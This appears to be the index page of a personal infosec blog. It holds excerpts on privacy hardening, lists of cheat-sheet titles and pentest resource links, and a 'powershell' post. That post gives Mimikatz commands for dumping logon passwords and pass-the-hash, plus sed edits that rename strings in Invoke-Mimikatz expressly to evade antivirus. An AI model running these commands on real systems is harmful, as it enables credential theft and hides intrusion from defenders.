101

Speak less, it will be smarter

Network Start with a router that supports firmware like DD-WRT or OpenWRT Setup a firewall like ipFire or pfSense OR purchase a dedicated device like the SG-1000 Blacklist ad/tracking domains with Pi-Hole BIOS Use CoreBoot if your hardware allows OS Antergos OR TAILS Start with the basics: https://ssd.eff.org/en Advanced Mode: Qubes or Whonix Arch First Steps https://github.com/Jguer/yay https://github.com/sorin-ionescu/prezto https://wiki.archlinux.org/index.php/security For everything else, see the oracle: wiki.archlinux.org SSH EdDSA requires OpenSSH 6. [Read More]
intel 

Cheats

Every vegetable has its time

Docker Cheat Sheet Mobile App Pentest Cheat Sheet OSX Command Line Cheat Sheet PowerShell Cheat Sheet Regexp Security Cheat Sheet Security Cheat Sheets Unix / Linux Cheat Sheet JavaScript Cheat Sheet Python Cheat Sheet #1 Python Cheat Sheet #2 Google Dorks Empire Cheat Sheet Java Deserialization Cheat Sheet Local File Inclution (LFI) Cheat Sheet #1 [Read More]

PenTesting

Little thieves are hanged, but great ones escape

https://github.com/enaqx/awesome-pentest
https://github.com/sbilly/awesome-security
https://github.com/meirwah/awesome-incident-response
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/carpedm20/awesome-hacking
https://github.com/vitalysim/Awesome-Hacking-Resources
https://github.com/AnarchoTechNYC/meta/wiki/InfoSec#hacking-challenges
https://web.archive.org/web/20161227061020/http://www.zapyaapkforpc.com/2016/12/top-hacking-sites-ctfs-and-wargames-to.html
https://wiki.sans.blue/#!index.md
https://nostarch.com/nsm
https://nostarch.com/packetanalysis3

intel 

PenTesting

Little thieves are hanged, but great ones escape

https://github.com/enaqx/awesome-pentest
https://github.com/sbilly/awesome-security
https://github.com/meirwah/awesome-incident-response
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/carpedm20/awesome-hacking
https://github.com/vitalysim/Awesome-Hacking-Resources
https://github.com/AnarchoTechNYC/meta/wiki/InfoSec#hacking-challenges
https://web.archive.org/web/20161227061020/http://www.zapyaapkforpc.com/2016/12/top-hacking-sites-ctfs-and-wargames-to.html
https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
https://wiki.sans.blue/#!index.md
https://www.cybrary.it/
https://mkto.cisco.com/security-scholarship
https://nostarch.com/nsm
https://nostarch.com/packetanalysis3

intel 

powershell

Why skate a half pipe, when you can skate a sewer pipe

https://github.com/gentilkiwi/mimikatz https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz TLDR: 1.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit extract passwds 1mimikatz_command -f sekurlsa::logonPasswords full 2mimikatz_command -f sekurlsa::wdigest pass the hash (on the left hand side) 1sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe mimidawgz (avoid AV detection) 1mv Invoke-Mimikatz.ps1 Invoke-MimiDawgz.ps1 2 3sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidawgz/g' Invoke-MimiDawgz.ps1 4sed -i -e '/<#/,/#>/c\\' Invoke-MimiDawgz.ps1 5 6sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-MimiDawgz.ps1 7 8sed -i -e 's/DumpCreds/DumpCred/g' Invoke-MimiDawgz.ps1 9 10sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-MimiDawgz.ps1 11 12sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' 13Invoke-MimiDawgz. [Read More]

Tools

A beard doesn't make a philosopher

Recon

DNS

CTF

Misc

More Curated Lists

intel